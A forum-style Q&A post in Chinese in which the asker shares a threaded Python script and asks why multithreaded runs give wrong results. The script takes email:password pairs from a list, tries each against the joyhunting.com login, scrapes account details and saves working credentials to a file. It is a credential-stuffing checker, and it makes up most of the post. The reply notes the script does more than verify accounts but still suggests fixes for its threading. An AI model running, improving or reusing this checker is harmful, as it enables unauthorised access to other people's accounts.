Python 线程队列问题

0 投票
1 回答
631 浏览
提问于 2025-04-16 04:50

大家好。

我写了一个Python脚本,用线程来检查一些账户在某个网站上是否存在。

当我运行一个线程时,一切都很顺利,但如果我增加到3到5个线程,

结果和一个线程时差别就很大。我手动检查过,

发现增加线程后结果并不正确。

我觉得我的一些线程代码需要调整,或者使用队列模块怎么样?

有没有人能给我建议或者帮我调整一下我的脚本?谢谢大家!

# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time

# Maximum number of process to spawn at any one given time.
MAX_PROCS =5

maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'

# Threading class
class CheckMyThread ( threading.Thread ):
 llemail = ""
 llpassword = ""
 def __init__ ( self , lemail, lpassword):
  self.llemail = lemail
  self.llpassword = lpassword
  threading.Thread.__init__( self )
  pass

 def run ( self ):
  valid = []
  llemail = self.llemail
  llpassword = self.llpassword 
  try:
   params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
   rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
   rs = mechanize.urlopen(rq)
   data = rs.read()      
   logged_in = r'var _id'  in data                    #정상 로그인                           
   if logged_in :
       rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
       rs = mechanize.urlopen(rq)
       maindata = rs.read(50024)
       jun_member = r"준회원"
       save = open(SAVEFILE, 'a')
       for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
        matched =  match.group(1)    
       for match2 in re.finditer(r"var _gd(.*?);", data):
        matched2 = match2.group(1)
        print '%s, %s' %(matched, matched2)  
        break
       rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
       rs1=mechanize.urlopen(rq1)
       sendmsg= rs1.read()
       #print sendmsg       
       match3 = ''
       for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
        matched3 = match3.group(1)
        #print matched3
        print 'bad'
        break
       if match3 =='':
        save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
        save.close()      
        print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)                
   else:
    print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
    return 0              
  except:
   print '[!] Exception checking %s.' % (llemail)
   return 1
  return 0   
try:
 listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
 print '[!] %s does not exist. Please create the file!' % (maillist) 
 exit (2)

#Loop through the file
for line in listhandle:
 #Parse the line
 try:
  details = line.split(':')
  email = details[0]
  password = details[1].replace('\n', '')

 #Throw an error and exit.
 except:
  print '[!] Parse Error in %s on line %n.' % (maillist, currline)
  exit

 #Run a while statement:
 if len(threads) < MAX_PROCS:
  #Fork out into another process
  print '[ ] Starting thread to check account %s.' % (email);
  thread = CheckMyThread(email, password)
  thread.start()
  threads.append(thread)

 else:
  #Wait for a thread to exit.
  gonext = 0
  while 1 == 1:
   i = 0
   #print '[ ] Checking for a thread to exit...'
   while i < len(threads):
    #print '[ ] %d' % (i)
    try: 
     if threads[i]:
      if not threads[i].isAlive():
       #print '[-] Thread %d is dead' % (i)
       threads.pop(i)
       print '[ ] Starting thread to check account %s.' % (email);
       thread = CheckMyThread(email, password)
       thread.start() 
       threads.append(thread)
       gonext = 1
       break
      else:
       #print '[+] Thread %d is still running' % (i)
       pass
     else:
      print '[ ] Crap.'; 
    except NameError:
     print '[ ] AWWW COME ON!!!!'
    i = i + 1 
   time.sleep(0.050);
   if gonext:
    break

1 个回答

0

你能具体说明一下有什么不同的结果吗?

从我看到的情况来看,这段代码做的事情远不止验证账户。

从我看到的,你是从多个线程向一个文件里添加内容,我觉得这样做是不安全的。

另外,尽我所知,Mechanize会为所有请求使用共享的cookie存储,所以它们可能会相互干扰。建议在run()里面使用单独的mechanize.Browser(),而不是mechanize.Request()

撰写回答